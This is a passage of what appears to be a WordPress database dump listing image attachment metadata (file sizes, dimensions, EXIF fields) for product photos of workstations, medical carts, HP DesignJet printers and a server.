C-Single-LD-Sit-Stand-Workstation-500x400.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:51:\"WorkFit-C-Single-LD-Sit-Stand-Workstation-20x20.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3063,2493,'_wp_attached_file','2018/12/WorkFit-C-Dual-Sit-Stand-Workstation.jpg'),(3064,2493,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:48:\"2018/12/WorkFit-C-Dual-Sit-Stand-Workstation.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"WorkFit-C-Dual-Sit-Stand-Workstation-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"WorkFit-C-Dual-Sit-Stand-Workstation-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:48:\"WorkFit-C-Dual-Sit-Stand-Workstation-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:48:\"WorkFit-C-Dual-Sit-Stand-Workstation-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:48:\"WorkFit-C-Dual-Sit-Stand-Workstation-500x400.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:46:\"WorkFit-C-Dual-Sit-Stand-Workstation-20x20.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3065,2494,'_wp_attached_file','2018/12/Neo-FlexÂ®-Laptop-Cart.jpg'),(3066,2494,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:34:\"2018/12/Neo-FlexÂ®-Laptop-Cart.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"Neo-FlexÂ®-Laptop-Cart-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"Neo-FlexÂ®-Laptop-Cart-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:34:\"Neo-FlexÂ®-Laptop-Cart-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:34:\"Neo-FlexÂ®-Laptop-Cart-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:34:\"Neo-FlexÂ®-Laptop-Cart-500x400.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:32:\"Neo-FlexÂ®-Laptop-Cart-20x20.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3067,2495,'_wp_attached_file','2018/12/StyleViewÂ®-Laptop-Cart-SV40.jpg'),(3068,2495,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3000;s:6:\"height\";i:3000;s:4:\"file\";s:40:\"2018/12/StyleViewÂ®-Laptop-Cart-SV40.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:40:\"StyleViewÂ®-Laptop-Cart-SV40-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:40:\"StyleViewÂ®-Laptop-Cart-SV40-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:40:\"StyleViewÂ®-Laptop-Cart-SV40-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:42:\"StyleViewÂ®-Laptop-Cart-SV40-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:40:\"StyleViewÂ®-Laptop-Cart-SV40-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:40:\"StyleViewÂ®-Laptop-Cart-SV40-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:40:\"StyleViewÂ®-Laptop-Cart-SV40-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:38:\"StyleViewÂ®-Laptop-Cart-SV40-20x20.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3069,2496,'_wp_attached_file','2018/12/StyleViewÂ®-Telemedicine-Cart-Single-Monitor-Powered.jpg'),(3070,2496,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:64:\"2018/12/StyleViewÂ®-Telemedicine-Cart-Single-Monitor-Powered.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:64:\"StyleViewÂ®-Telemedicine-Cart-Single-Monitor-Powered-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:64:\"StyleViewÂ®-Telemedicine-Cart-Single-Monitor-Powered-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:64:\"StyleViewÂ®-Telemedicine-Cart-Single-Monitor-Powered-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:64:\"StyleViewÂ®-Telemedicine-Cart-Single-Monitor-Powered-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:64:\"StyleViewÂ®-Telemedicine-Cart-Single-Monitor-Powered-500x400.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:62:\"StyleViewÂ®-Telemedicine-Cart-Single-Monitor-Powered-20x20.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3071,2497,'_wp_attached_file','2018/12/StyleViewÂ®-Telemedicine-Cart-Powered-.jpg'),(3072,2497,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:499;s:6:\"height\";i:500;s:4:\"file\";s:50:\"2018/12/StyleViewÂ®-Telemedicine-Cart-Powered-.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:50:\"StyleViewÂ®-Telemedicine-Cart-Powered--150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:50:\"StyleViewÂ®-Telemedicine-Cart-Powered--300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:50:\"StyleViewÂ®-Telemedicine-Cart-Powered--300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:50:\"StyleViewÂ®-Telemedicine-Cart-Powered--480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:50:\"StyleViewÂ®-Telemedicine-Cart-Powered--499x400.jpg\";s:5:\"width\";i:499;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:48:\"StyleViewÂ®-Telemedicine-Cart-Powered--20x20.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3073,2498,'_wp_attached_file','2018/12/CareFitâ„¢-Slim-LCD-Cart-1-Drawer-1x1-.jpg'),(3074,2498,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:50:\"2018/12/CareFitâ„¢-Slim-LCD-Cart-1-Drawer-1x1-.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:50:\"CareFitâ„¢-Slim-LCD-Cart-1-Drawer-1x1--150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:50:\"CareFitâ„¢-Slim-LCD-Cart-1-Drawer-1x1--300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:50:\"CareFitâ„¢-Slim-LCD-Cart-1-Drawer-1x1--300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:50:\"CareFitâ„¢-Slim-LCD-Cart-1-Drawer-1x1--480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:50:\"CareFitâ„¢-Slim-LCD-Cart-1-Drawer-1x1--500x400.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:48:\"CareFitâ„¢-Slim-LCD-Cart-1-Drawer-1x1--20x20.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3075,2502,'_wp_attached_file','2018/12/HP-DesignJet-T120-Printer.jpg'),(3076,2502,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:765;s:4:\"file\";s:37:\"2018/12/HP-DesignJet-T120-Printer.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"HP-DesignJet-T120-Printer-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"HP-DesignJet-T120-Printer-300x230.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:37:\"HP-DesignJet-T120-Printer-768x588.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:588;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:37:\"HP-DesignJet-T120-Printer-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:37:\"HP-DesignJet-T120-Printer-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:37:\"HP-DesignJet-T120-Printer-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:35:\"HP-DesignJet-T120-Printer-20x15.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:15;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3077,2503,'_wp_attached_file','2018/12/HP-DesignJet-T1700-Printer-series.jpg'),(3078,2503,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:450;s:6:\"height\";i:450;s:4:\"file\";s:45:\"2018/12/HP-DesignJet-T1700-Printer-series.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"HP-DesignJet-T1700-Printer-series-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"HP-DesignJet-T1700-Printer-series-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:45:\"HP-DesignJet-T1700-Printer-series-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:45:\"HP-DesignJet-T1700-Printer-series-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:45:\"HP-DesignJet-T1700-Printer-series-450x400.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:43:\"HP-DesignJet-T1700-Printer-series-20x20.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3079,2504,'_wp_attached_file','2018/12/HP-DesignJet-T830-Multifunction-Printer-series.jpg'),(3080,2504,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3410;s:6:\"height\";i:2275;s:4:\"file\";s:58:\"2018/12/HP-DesignJet-T830-Multifunction-Printer-series.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"HP-DesignJet-T830-Multifunction-Printer-series-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"HP-DesignJet-T830-Multifunction-Printer-series-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"HP-DesignJet-T830-Multifunction-Printer-series-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"HP-DesignJet-T830-Multifunction-Printer-series-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:58:\"HP-DesignJet-T830-Multifunction-Printer-series-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:58:\"HP-DesignJet-T830-Multifunction-Printer-series-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:58:\"HP-DesignJet-T830-Multifunction-Printer-series-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:56:\"HP-DesignJet-T830-Multifunction-Printer-series-20x13.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"11\";s:6:\"credit\";s:11:\"@haut-touch\";s:6:\"camera\";s:11:\"NIKON D800E\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1497445701\";s:9:\"copyright\";s:10:\"haut-touch\";s:12:\"focal_length\";s:2:\"60\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.004\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(3081,2505,'_wp_attached_file','2018/12/HP-DesignJet-T3500-Production-Multifunction-Printer.jpg'),(3082,2505,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:63:\"2018/12/HP-DesignJet-T3500-Production-Multifunction-Printer.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:63:\"HP-DesignJet-T3500-Production-Multifunction-Printer-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:63:\"HP-DesignJet-T3500-Production-Multifunction-Printer-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:63:\"HP-DesignJet-T3500-Production-Multifunction-Printer-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:63:\"HP-DesignJet-T3500-Production-Multifunction-Printer-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:63:\"HP-DesignJet-T3500-Production-Multifunction-Printer-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:61:\"HP-DesignJet-T3500-Production-Multifunction-Printer-20x20.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3083,2506,'_wp_attached_file','2018/12/HP-DesignJet-Z6610-Production-Printer.jpg'),(3084,2506,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:616;s:6:\"height\";i:472;s:4:\"file\";s:49:\"2018/12/HP-DesignJet-Z6610-Production-Printer.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:49:\"HP-DesignJet-Z6610-Production-Printer-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:49:\"HP-DesignJet-Z6610-Production-Printer-300x230.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:49:\"HP-DesignJet-Z6610-Production-Printer-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:49:\"HP-DesignJet-Z6610-Production-Printer-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:49:\"HP-DesignJet-Z6610-Production-Printer-616x400.jpg\";s:5:\"width\";i:616;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:47:\"HP-DesignJet-Z6610-Production-Printer-20x15.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:15;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3085,2507,'_wp_attached_file','2018/12/HP-DesignJet-Z6810-Production-Printer-series.jpg'),(3086,2507,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:941;s:6:\"height\";i:500;s:4:\"file\";s:56:\"2018/12/HP-DesignJet-Z6810-Production-Printer-series.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:56:\"HP-DesignJet-Z6810-Production-Printer-series-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:56:\"HP-DesignJet-Z6810-Production-Printer-series-300x159.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:159;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:56:\"HP-DesignJet-Z6810-Production-Printer-series-768x408.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:408;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:56:\"HP-DesignJet-Z6810-Production-Printer-series-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:56:\"HP-DesignJet-Z6810-Production-Printer-series-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:56:\"HP-DesignJet-Z6810-Production-Printer-series-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:54:\"HP-DesignJet-Z6810-Production-Printer-series-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3087,2509,'_wp_attached_file','2018/12/HPE-ProLiant-DL325-Gen10-Server.png'),(3088,2509,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";